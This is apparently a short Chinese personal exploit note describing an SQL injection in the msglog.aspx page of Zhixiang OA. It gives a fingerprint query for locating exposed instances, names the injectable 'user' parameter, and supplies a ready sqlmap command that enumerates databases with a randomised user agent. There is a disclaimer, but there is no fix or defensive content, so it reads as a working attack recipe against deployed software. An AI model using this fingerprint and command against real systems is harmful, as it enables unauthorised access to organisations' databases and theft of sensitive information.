前言:致翔OA产品漏洞复现笔记,供自己使用,不定期更新
声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。
漏洞列表:
致翔OA msglog.aspx SQL注入漏洞
致翔OA msglog.aspx SQL注入漏洞
漏洞描述
致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息
漏洞影响
致翔OA
网络测绘
app="致翔软件-致翔OA"
漏洞复现
存在注入的参数是user
poyload:
/mainpage/msglog.aspx?user=1
py -3 sqlmap.py -u "http://xx.xx.xx/mainpage/msglog.aspx?user=1" -p user --dbs --random-agent